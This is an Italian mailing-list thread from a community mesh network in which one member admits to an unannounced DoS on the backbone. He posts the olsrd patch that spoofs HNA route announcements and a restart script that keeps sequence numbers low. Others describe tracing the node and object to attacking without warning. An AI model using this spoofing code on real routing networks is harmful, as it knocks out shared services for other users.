<html><body><div style="color:#000; background-color:#fff; font-family:lucida console, sans-serif;font-size:10pt"><div><span>se lo scopo è testare la rete per renderla inattaccabile, non c'e' bisogno di farlo all'improvviso e di nascosto.</span></div><div style="color: rgb(0, 0, 0); font-size: 13.63636302947998px; font-family: 'lucida console', sans-serif; background-color: transparent; font-style: normal;"><span>Basta riservare un giorno avvisando in anticipo che in tale ora verranno fatti dei test di attacco senza rivelare subito il tipo di attacco, per vedere cosa succede e in caso decidere tutti insieme su come effettuare il rimedio</span></div><div style="color: rgb(0, 0, 0); font-size: 13.63636302947998px; font-family: 'lucida console', sans-serif; background-color: transparent; font-style: normal;"><span><br></span></div><div style="color: rgb(0, 0, 0); font-size: 13.63636302947998px; font-family: 'lucida console', sans-serif; background-color:
 transparent; font-style: normal;"><span>E' ingiusto attaccare, creare il panico  e aspettare che gli altri trovino il rimedio</span></div><div style="color: rgb(0, 0, 0); font-size: 13.63636302947998px; font-family: 'lucida console', sans-serif; background-color: transparent; font-style: normal;"><span><br></span></div><div style="color: rgb(0, 0, 0); font-size: 13.63636302947998px; font-family: 'lucida console', sans-serif; background-color: transparent; font-style: normal;"><span>Ciao :-)</span></div><div style="color: rgb(0, 0, 0); font-size: 13.63636302947998px; font-family: 'lucida console', sans-serif; background-color: transparent; font-style: normal;"><span>Daniela<br><br></span></div><div></div><div> </div><div>Key GPG ID: AA2DA887<br>----<br>Un guerriero accetta la sua parte, qualunque possa essere, e l'accetta in assoluta umilta'. Accetta in umilta' cio' che egli e', e non ne fa motivo di rimpianto ma di sfida. Io conosco soltanto
 l’umilta' del guerriero, e questa non mi permettera' mai di schiavizzare qualcuno. <br>Carlos Castaneda.</div><div class="yahoo_quoted" style="display: block;"> <div style="font-family: 'lucida console', sans-serif; font-size: 10pt;"> <div style="font-family: HelveticaNeue, 'Helvetica Neue', Helvetica, Arial, 'Lucida Grande', sans-serif; font-size: 12pt;"> <div dir="ltr"> <font size="2" face="Arial"> Il Domenica 25 Maggio 2014 9:37, Andrea Pescetelli <andrea.pescetelli@gmail.com> ha scritto:<br> </font> </div>  <br><br> <div class="y_msg_container"><div id="yiv0840785050"><div><div dir="ltr">Ciao<br clear="none">
Vorrei chiedere di prendere provvedimenti seri a seguito di questi eventi e comportamenti che da una settimana stanno invalidando sia il rispetto reciproco sia il buon finzionamento della rete stessa da parte di Saverio Proto.</div>

<div class="yiv0840785050gmail_quote">Il 25/mag/2014 09:07 "Alessandro Gnagni" <<a rel="nofollow" shape="rect" ymailto="mailto:alessandro@gnagni.it" target="_blank" href="mailto:alessandro@gnagni.it">alessandro@gnagni.it</a>> ha scritto:<div class="yiv0840785050yqt7905328491" id="yiv0840785050yqtfd52912"><br clear="none"><blockquote class="yiv0840785050gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">
<div dir="ltr">Non è qualche ora. Va avanti da giovedì mattina.<br clear="none">
Ma almeno avvisare? Uno non può perdere tempo appresso a ste cose...<br clear="none">
Jabber è stato ko da giovedì per sta cosa. </div>
<div class="yiv0840785050gmail_quote">Il 25/mag/2014 01:03 "Saverio Proto" <<a rel="nofollow" shape="rect" ymailto="mailto:zioproto@gmail.com" target="_blank" href="mailto:zioproto@gmail.com">zioproto@gmail.com</a>> ha scritto:<br clear="none"><blockquote class="yiv0840785050gmail_quote" style="margin:0 0 0 .8ex;border-left:1px #ccc solid;padding-left:1ex;">

Ciao,<br clear="none">
<br clear="none">
Metto in Cc: anche <a rel="nofollow" shape="rect" ymailto="mailto:wireless@ml.ninux.org" target="_blank" href="mailto:wireless@ml.ninux.org">wireless@ml.ninux.org</a> perché questa email contiene<br clear="none">
informazioni tecniche interessanti.<br clear="none">
<br clear="none">
bravi, avete risolto il problema in fretta :) Ho volutamente provato<br clear="none">
un attacco DoS sul backbone per capire che effetto poteva avere.<br clear="none">
<br clear="none">
ecco la patch di olsrd con cui generavo l'attacco DoS<br clear="none">
<br clear="none">
diff --git a/src/build_msg.c b/src/build_msg.c<br clear="none">
index 109f955..e252981 100644<br clear="none">
--- a/src/build_msg.c<br clear="none">
+++ b/src/build_msg.c<br clear="none">
@@ -1021,7 +1021,11 @@ serialize_hna4(struct interface *ifp)<br clear="none">
   m = (union olsr_message *)msg_buffer;<br clear="none">
<br clear="none">
   /* Fill header */<br clear="none">
-  m->v4.originator = olsr_cnf->main_addr.v4.s_addr;<br clear="none">
+  struct in_addr fakesource;<br clear="none">
+  fakesource.s_addr = 0;<br clear="none">
+  //inet_hton(2956867021,&fakesource);<br clear="none">
+  inet_aton("172.16.40.40",&fakesource);<br clear="none">
+  m->v4.originator = fakesource.s_addr;<br clear="none">
   m->v4.hopcnt = 0;<br clear="none">
   m->v4.ttl = MAX_TTL;<br clear="none">
   m->v4.olsr_msgtype = HNA_MESSAGE;<br clear="none">
<br clear="none">
<br clear="none">
una domanda,<br clear="none">
<br clear="none">
se avessi patchato anche:<br clear="none">
<br clear="none">
m->v4.hopcnt = XXX<br clear="none">
<br clear="none">
mettendo numeri casuali..<br clear="none">
<br clear="none">
sarebbe stato altrettanto facile capire chi è che iniettava questi messaggi ?<br clear="none">
<br clear="none">
mi sto divertendo parecchio con questi attacchi DoS, sono molto<br clear="none">
istruttivi. Per chi vuole giocare insieme a me a programmare in C<br clear="none">
possiamo approfondire il giovedi sera al Sans Papiers. (Il prossimo<br clear="none">
che vorrei provare è DrDoS su snmp).<br clear="none">
<br clear="none">
un problema di questo attacco sono cmq i sequence number. Per rendere<br clear="none">
l'attacco efficace ho dovuto far andare la mia instanza patchata di<br clear="none">
OLSR a singhiozzo:<br clear="none">
<br clear="none">
import os<br clear="none">
import time<br clear="none">
<br clear="none">
while True:<br clear="none">
        os.system("olsrd")<br clear="none">
        print "started\n"<br clear="none">
        time.sleep(120)<br clear="none">
        os.system("killall olsrd")<br clear="none">
        print "killed\n"<br clear="none">
        time.sleep(300)<br clear="none">
<br clear="none">
in quanto avevo bisogno che i miei sequence number dovevano sempre<br clear="none">
essere piu bassi di quelli del spoofato, altrimenti venivano scartati<br clear="none">
come out of sequence.<br clear="none">
<br clear="none">
vi va di scrivere insieme un articoletto per il blog ? Io scrivo la<br clear="none">
parte di come ti costruisce l'attacco e voi la parte di come avete<br clear="none">
fatto ad identificare il nodo spoofato ?<br clear="none">
<br clear="none">
ho staccatto il nodo attaccante, il gioco è finito :)<br clear="none">
<br clear="none">
ah... vi prego nessun malumore per qualche oretta di disservizi, this<br clear="none">
is Ninux. Si fanno queste cose perché ci si diverte insieme.<br clear="none">
<br clear="none">
ciao :)<br clear="none">
<br clear="none">
Saverio<br clear="none">
<br clear="none">
Il 24 maggio 2014 23:23, Andrea Pescetelli<br clear="none">
<<a rel="nofollow" shape="rect" ymailto="mailto:andrea.pescetelli@gmail.com" target="_blank" href="mailto:andrea.pescetelli@gmail.com">andrea.pescetelli@gmail.com</a>> ha scritto:<br clear="none">
> Saverio,<br clear="none">
> Abbiamo rilevato che dal nodo Gallia viene generato un messaggio olsr hna<br clear="none">
> con originator 172.16.40.40, validity time 570, hna <a rel="nofollow" shape="rect" target="_blank"  href="http://176.62.53.192/28">176.62.53.192/28</a><br clear="none">
> proveniente dal nodo in oggetto.<br clear="none">
><br clear="none">
> Questo problema sta oscurando diversi servizi di ninux in farm appartenenti<br clear="none">
> a quella subnet.<br clear="none">
><br clear="none">
> Abbiamo triangolato la posizione basandoci sugli hop count dei cammini<br clear="none">
> multipli.<br clear="none">
> puoi verificare?<br clear="none">
><br clear="none">
> Grazie<br clear="none">
><br clear="none">
> Fish, Hispanico, Halino<br clear="none">
> --<br clear="none">
> Andrea Pescetelli aka Fish<br clear="none">
> Skype: andrea5742<br clear="none">
> Ninux int: 5001/5002<br clear="none">
> Mobile: <a rel="nofollow" shape="rect" href="">+39 3891156050</a><br clear="none">
><br clear="none">
><br clear="none">
><br clear="none">
><br clear="none">
</blockquote></div>
<br clear="none">_______________________________________________<br clear="none">
Wireless mailing list<br clear="none">
<a rel="nofollow" shape="rect" ymailto="mailto:Wireless@ml.ninux.org" target="_blank" href="mailto:Wireless@ml.ninux.org">Wireless@ml.ninux.org</a><br clear="none">
<a rel="nofollow" shape="rect" target="_blank" href="http://ml.ninux.org/mailman/listinfo/wireless">http://ml.ninux.org/mailman/listinfo/wireless</a><br clear="none">
<br clear="none"></blockquote></div></div></div></div><br><div class="yqt7905328491" id="yqtfd04916">_______________________________________________<br clear="none">Wireless mailing list<br clear="none"><a shape="rect" ymailto="mailto:Wireless@ml.ninux.org" href="mailto:Wireless@ml.ninux.org">Wireless@ml.ninux.org</a><br clear="none"><a shape="rect" href="http://ml.ninux.org/mailman/listinfo/wireless" target="_blank">http://ml.ninux.org/mailman/listinfo/wireless</a></div><br><br></div>  </div> </div>  </div> </div></body></html>